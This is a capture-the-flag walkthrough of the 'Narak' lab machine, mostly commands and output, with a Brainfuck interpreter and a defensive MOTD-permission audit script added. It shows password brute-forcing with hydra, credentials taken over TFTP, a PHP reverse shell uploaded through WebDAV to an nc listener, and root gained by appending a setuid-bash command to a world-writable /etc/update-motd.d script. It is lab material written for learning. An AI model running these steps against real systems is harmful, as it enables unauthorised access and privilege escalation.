Narak Machine

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 21:28 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:02:D4:D7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 192.1.1.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 21:31 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00026s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:02:D4:D7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.1.1.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 22:23 EDT
Warning: 192.1.1.129 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.1.1.129
Host is up (0.0017s latency).
All 65535 scanned ports on 192.1.1.129 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:02:D4:D7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.76 seconds

Looking at the Web Service

Browse the web interface; it is religion-themed. Check the page source and the clickable elements, and download the images to see whether anything is hidden in them (steganography).

At first I clicked "do not click" and saw

At first I thought the ? here was hinting at a code-execution vulnerability, so I tried ?cmd=whoami; the server answered 200 but the response was identical. I then fuzzed the parameter name with wfuzz and still got nothing useful:

┌──(kali㉿kali)-[~]
└─$ wfuzz -c --hc 200 -w /usr/share/wordlists/wfuzz/general/big.txt http://192.1.1.129/images/666.jpg?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.1.1.129/images/666.jpg?FUZZ=something
Total requests: 3024

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================


Total time: 0
Processed Requests: 3024
Filtered Requests: 3024
Requests/sec.: 0

Based on the URL structure I also took a look at the images path, but there was nothing of value there.

Directory Brute-Forcing

Try brute-forcing directories:

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64
[sudo] password for kali:
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.129
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2023/06/08 21:47:41 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 311] [--> http://192.1.1.129/images/]
/webdav (Status: 401) [Size: 458]
/server-status (Status: 403) [Size: 276]
Progress: 215649 / 220561 (97.77%)===============================================================
2023/06/08 21:47:53 Finished
===============================================================

Two directories come back, /images and /webdav. The first has already been examined. A quick search shows that WebDAV is a protocol for uploading and downloading files and operating on uploaded files. Visiting /webdav pops up a prompt for a username and password. My first approach was to brute-force it with hydra, using cewl to build a wordlist from the site first:

┌──(kali㉿kali)-[~]
└─$ cewl http://192.1.1.129/ > user.txt
┌──(kali㉿kali)-[~]
└─$ hydra -L user.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt 192.1.1.129 http-get /webdav
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-08 22:15:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82917 login tries (l:83/p:999), ~5183 tries per task
[DATA] attacking http-get://192.1.1.129:80/webdav
[STATUS] 8637.00 tries/min, 8637 tries in 00:01h, 74280 to do in 00:09h, 16 active
[STATUS] 8794.33 tries/min, 26383 tries in 00:03h, 56534 to do in 00:07h, 16 active

Far too slow... so I had to consider other approaches. The earlier directory brute-force used no file extensions; this time I added common ones:

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,zip,sql,rar
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.129
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,zip,sql,rar
[+] Timeout: 10s
===============================================================
2023/06/08 22:24:37 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 311] [--> http://192.1.1.129/images/]
/tips.txt (Status: 200) [Size: 58]
/webdav (Status: 401) [Size: 458]
/server-status (Status: 403) [Size: 276]
Progress: 1099441 / 1102805 (99.69%)===============================================================
2023/06/08 22:25:42 Finished
===============================================================

There is a tips.txt; let's take a look at it.

It hints at a file called creds.txt. That file is not in the web root; my first guess was that it might be inside webdav. I was stuck here for a long time with no good idea, and the brute-force produced nothing. After watching the 红队笔记 video, it turned out the UDP part of the nmap scan had been unreliable: the full-range UDP scan at --min-rate 10000 hit the retransmission cap and reported every port as open|filtered, which hides real services. This time I scanned only the most common UDP ports:

TFTP

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.1.1.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 22:28 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00028s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp closed route
631/udp closed ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:02:D4:D7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

TFTP may be open (it shows as open|filtered), but that is not certain, so just try it directly:

┌──(kali㉿kali)-[~]
└─$ tftp 192.1.1.129
tftp> ls
?Invalid command
tftp> help
?Invalid command
tftp> ?
Commands may be abbreviated. Commands are:

connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help information
tftp> get creds.txt
Received 22 bytes in 0.0 seconds

creds.txt was retrieved; view its contents locally:

┌──(kali㉿kali)-[~]
└─$ cat creds.txt
eWFtZG9vdDpTd2FyZw==

┌──(kali㉿kali)-[~]
└─$ cat creds.txt | base64 -d
yamdoot:Swarg

Use cadaver to interact with the WebDAV share. According to what I found online, files can be uploaded and then requested from the browser, which gives a reverse shell:

┌──(kali㉿kali)-[~]
└─$ cadaver http://192.1.1.129/webdav
Authentication required for webdav on server 192.1.1.129:
Username: yamdoot
Password:
dav:/webdav/> ls
Listing collection `/webdav/`: collection is empty.
dav:/webdav/> ?
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> pwd
Current collection is `http://192.1.1.129/webdav/`.
dav:/webdav/> put php-reverse-shell.php
Uploading php-reverse-shell.php to `/webdav/php-reverse-shell.php`:
Progress: [=============================>] 100.0% of 5493 bytes succeeded.

Getting a Shell

The reverse shell connects back successfully:

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
[sudo] password for kali:
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.129] 34332
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
19:36:29 up 1:09, 0 users, load average: 0.00, 1.14, 1.72
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 4: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts
www-data@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
narak:x:1000:1000:narak,,,:/home/narak:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
yamdoot:x:1001:1001:,,,:/home/yamdoot:/bin/bash
inferno:x:1002:1002:,,,:/home/inferno:/bin/bash

Privilege Escalation

Information Gathering

There is a user named yamdoot; try whether the account reuses the password obtained earlier for WebDAV.

www-data@ubuntu:/$ su yamdoot
su yamdoot
Password: Swarg

su: Authentication failure

No luck. Continuing with information gathering:

www-data@ubuntu:/$ cd /var/www
cd /var/www
www-data@ubuntu:/var/www$ ls
ls
DavLock html webdav
www-data@ubuntu:/var/www$ ls -liah
ls -liah
total 24K
920702 drwxr-xr-x 4 www-data www-data 4.0K Sep 21 2020 .
917591 drwxr-xr-x 12 root root 4.0K Sep 21 2020 ..
918264 -rwxr-xr-x 1 www-data www-data 12K Sep 21 2020 DavLock
920703 drwxr-xr-x 3 www-data www-data 4.0K Sep 22 2020 html
917601 drwxr-xr-x 2 www-data www-data 4.0K Jun 8 19:36 webdav
www-data@ubuntu:/var/www$ cat DavLock
cat DavLock
�d�4эh^www-data@ubuntu:/var/www$ cp DavLock ./webdav
cp DavLock ./webdav

Spotted an odd file; I copied it into webdav and downloaded it to my machine. Inspecting it locally revealed nothing useful either.

www-data@ubuntu:/var/backups$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
www-data@ubuntu:/var/backups$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/var/backups$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@ubuntu:/var/backups$ export
export
declare -x APACHE_LOCK_DIR="/var/lock/apache2"
declare -x APACHE_LOG_DIR="/var/log/apache2"
declare -x APACHE_PID_FILE="/var/run/apache2/apache2.pid"
declare -x APACHE_RUN_DIR="/var/run/apache2"
declare -x APACHE_RUN_GROUP="www-data"
declare -x APACHE_RUN_USER="www-data"
declare -x INVOCATION_ID="1f3b99dd50fd422fa2154b386d70fd95"
declare -x JOURNAL_STREAM="9:17364"
declare -x LANG="C"
declare -x OLDPWD="/var"
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
declare -x PWD="/var/backups"
declare -x SHLVL="1"

Nothing useful in the cron jobs or the environment variables. Next, look at setuid files and writable files:

www-data@ubuntu:/var/run$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/umount
/bin/mount
/bin/ntfs-3g
/bin/su
/bin/fusermount
/bin/ping
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/vmware-user-suid-wrapper
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/traceroute6.iputils

What about writable files?

www-data@ubuntu:/var/run$ find / -type f -writable 2>/dev/null
find / -type f -writable 2>/dev/null
/mnt/hell.sh
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text
/etc/apache2/users.password
/var/www/webdav/DavLock
/var/www/webdav/php-reverse-shell.php
/var/www/html/index.html
/var/www/html/style.css
/var/www/html/images/9.jpg
/var/www/html/images/10.jpg
/var/www/html/images/7.jpg
/var/www/html/images/666.jpg
/var/www/html/images/13.jpg
/var/www/html/images/3.jpg
/var/www/html/images/19.jpg
/var/www/html/images/4.jpg
/var/www/html/images/14.jpg
/var/www/html/images/16.jpg
/var/www/html/images/5.jpg
/var/www/html/images/12.jpg
/var/www/html/images/18.jpg
/var/www/html/images/15.jpg
/var/www/html/images/8.jpg
/var/www/html/images/6.jpg
/var/www/html/images/1.jpg
/var/www/html/images/2.jpg
/var/www/html/images/11.jpg
/var/www/html/images/17.jpg
/var/www/html/font.css
/var/www/DavLock
www-data@ubuntu:/var/run$ cat /etc/apache2/users.password
cat /etc/apache2/users.password
yamdoot:webdav:8ef09831d201bd84acb0ef99a4a98a91
www-data@ubuntu:/var/run$ cat /mnt/hell.sh
cat /mnt/hell.sh
#!/bin/bash

echo"Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
www-data@ubuntu:/var/run$ ls -liah /mnt/hell.sh
ls -liah /mnt/hell.sh
920902 -rwxrwxrwx 1 root root 124 Sep 22 2020 /mnt/hell.sh

Brainfuck

There is an interesting .sh file whose last line has very strange-looking syntax that I did not recognise. From the 红队笔记 video I learned that it is Brainfuck, so I installed the beef tool (a Brainfuck interpreter) to run it:

┌──(kali㉿kali)-[~]
└─$ beef bf
chitragupt
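To show what beef actually did with that line, here is a small Brainfuck interpreter written for this walkthrough (added example, not code from the original post or from the beef project); the program string is copied from the last line of /mnt/hell.sh, and the step limit is an addition so an untrusted, non-terminating program cannot hang the analysis.

```python
# Minimal Brainfuck interpreter with 8-bit wrapping cells.
# Added example; not part of the original post or of the beef tool.
from typing import Dict

# Program copied from the last line of /mnt/hell.sh on the target.
HELL_SH_PROGRAM = (
    "--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++."
    "--[--->+<]>--.-----.++++."
)


def _match_brackets(code: str) -> Dict[int, int]:
    """Pre-compute the jump table for '[' / ']' pairs; raise on a mismatch."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_brainfuck(code: str, max_steps: int = 1_000_000) -> str:
    """Execute `code` and return everything it printed.

    Characters other than > < + - . [ ] are ignored, so the shebang and the
    echo line of hell.sh could be fed in unchanged. Input (',') is not
    needed here and is treated as a no-op. `max_steps` bounds execution so
    a non-terminating program cannot hang the analysis.
    """
    jumps = _match_brackets(code)
    tape = bytearray(30_000)
    ptr = pc = steps = 0
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        op = code[pc]
        if op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]          # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]          # jump back to the loop start
        if not 0 <= ptr < len(tape):
            raise IndexError(f"tape pointer out of range at offset {pc}")
        pc += 1
    return "".join(out)


if __name__ == "__main__":
    print(run_brainfuck(HELL_SH_PROGRAM))
```

Running it prints the same ten-character string that beef produced above.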

That yields a string. Given the earlier hints, I guessed it was a password and tried it against the users listed in the passwd file:

www-data@ubuntu:/var/run$ su inferno
su inferno
Password: chitragupt

inferno@ubuntu:/var/run$ id
id
uid=1002(inferno) gid=1002(inferno) groups=1002(inferno)
inferno@ubuntu:/var/run$ whoami
whoami
inferno
inferno@ubuntu:/var/run$ uname -a
uname -a
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
inferno@ubuntu:/var/run$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:02:d4:d7 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.129/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1369sec preferred_lft 1369sec
inet6 fe80::20c:29ff:fe02:d4d7/64 scope link
valid_lft forever preferred_lft forever
inferno@ubuntu:/var/run$ sudo -l
sudo -l
[sudo] password for inferno: chitragupt

Sorry, user inferno may not run sudo on ubuntu.

Switching Users

Logged in as inferno successfully.

inferno@ubuntu:/var/run$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/umount
/bin/mount
/bin/ntfs-3g
/bin/su
/bin/fusermount
/bin/ping
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/vmware-user-suid-wrapper
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/traceroute6.iputils

Another round of information gathering:

inferno@ubuntu:/var/run$ cd /home
cd /home
inferno@ubuntu:/home$ ls
ls
inferno narak yamdoot
inferno@ubuntu:/home$ cd inferno
cd inferno
inferno@ubuntu:~$ ls
ls
user.txt
inferno@ubuntu:~$ cat user.txt
cat user.txt
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}
inferno@ubuntu:/home$ find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
<not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
/mnt/hell.sh
/home/inferno/.bash_logout
/home/inferno/.bashrc
/home/inferno/.profile
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text

Privilege Escalation via MOTD

The find filter used here (excluding /proc and /sys) is worth memorising; it makes later work smoother. Also, writable MOTD scripts are a common privilege escalation path.

After searching, I followed this technique. Note that you must log out and log back in over SSH for it to take effect, because the scripts in /etc/update-motd.d are executed as root when a login session is set up.

inferno@ubuntu:/home$ ls -al /etc/update-motd.d/
ls -al /etc/update-motd.d/
total 36
drwxrwxrwx 2 root root 4096 Sep 21 2020 .
drwxr-xr-x 80 root root 4096 Sep 22 2020 ..
-rwxrwxrwx 1 root root 1220 Apr 9 2018 00-header
-rwxrwxrwx 1 root root 1157 Apr 9 2018 10-help-text
-rwxrwxrwx 1 root root 4251 Apr 9 2018 50-motd-news
-rwxrwxrwx 1 root root 604 Mar 21 2018 80-esm
-rwxrwxrwx 1 root root 3017 Mar 21 2018 80-livepatch
-rwxrwxrwx 1 root root 299 May 18 2017 91-release-upgrade
inferno@ubuntu:/home$ echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header
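From the defender's side, the whole escalation depends on the 0777 permissions shown in that listing. The following audit helper is an added example (not from the original post) that reports anything under /etc/update-motd.d a non-root user could change; the `expected_uid` parameter and the constructed demo directory are assumptions made so the check can be exercised without root.

```python
# Audit helper for update-motd.d permissions. Added example, not from the
# original post. The scripts in this directory run as root at every login,
# so any entry a normal user can write is a root shell waiting to happen.
import os
import stat
import tempfile
from typing import List, Tuple

MOTD_DIR = "/etc/update-motd.d"


def audit_motd_dir(path: str = MOTD_DIR, expected_uid: int = 0) -> List[Tuple[str, str]]:
    """Return (path, problem) pairs for the directory and each entry in it.

    Flags: owner other than `expected_uid` (root on a real host), group- or
    world-writable mode bits, and symlinks (which could be repointed at an
    attacker-controlled script). An empty list means nothing was found.
    """
    findings: List[Tuple[str, str]] = []

    def check(p: str, st: os.stat_result, kind: str) -> None:
        if st.st_uid != expected_uid:
            findings.append((p, f"{kind} owned by uid {st.st_uid}, expected {expected_uid}"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((p, f"{kind} is world-writable"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((p, f"{kind} is group-writable (gid {st.st_gid})"))

    if not os.path.isdir(path):
        return findings  # nothing runs from a missing directory
    check(path, os.stat(path), "directory")
    for name in sorted(os.listdir(path)):
        p = os.path.join(path, name)
        st = os.lstat(p)
        if stat.S_ISLNK(st.st_mode):
            findings.append((p, "entry is a symlink"))
        elif stat.S_ISREG(st.st_mode):
            check(p, st, "script")
    return findings


def build_demo_dir() -> str:
    """Constructed sample mirroring the `ls -al /etc/update-motd.d/` listing
    above: a 0777 directory holding 0777 scripts, plus one 0755 script for
    contrast. Returns the temporary directory path."""
    d = tempfile.mkdtemp()
    for name, mode in (("00-header", 0o777), ("10-help-text", 0o777), ("99-safe", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho motd\n")
        os.chmod(p, mode)
    os.chmod(d, 0o777)
    return d


def demo() -> List[Tuple[str, str]]:
    """Audit the constructed directory; the current user is taken as the
    expected owner so the demo works without root. Yields three findings."""
    return audit_motd_dir(build_demo_dir(), expected_uid=os.getuid())


if __name__ == "__main__":
    for p, problem in audit_motd_dir() or [(MOTD_DIR, "no issues found")]:
        print(f"{p}: {problem}")
```

Run without arguments it audits the real directory; on this machine it would flag the directory itself and all six scripts as world-writable.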

Logging in over SSH

┌──(kali㉿kali)-[~]
└─$ ssh inferno@192.1.1.129
The authenticity of host '192.1.1.129 (192.1.1.129)' can't be established.
ED25519 key fingerprint is SHA256:A4qSwLMJMXo/YuhKxw/H/4ezPo8GmE3SuuMQr98X7TU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.129' (ED25519) to the list of known hosts.
inferno@192.1.1.129's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

inferno@ubuntu:~$ ./bash -p
bash-4.4# id
uid=1002(inferno) gid=1002(inferno) euid=0(root) groups=1002(inferno)
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
root.txt
bash-4.4# cat root.txt
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████


Root Flag: {9440aee508b6215995219c58c8ba4b45}

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/hackinarticles

Jeenali Kothari : https://www.linkedin.com/in/jeenali-kothari/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________

bash-4.4#

Source: https://i3eg1nner.github.io/2023/06/fcf9aaa77e9b.html
Author: I3eg1nner
Published: 9 June 2023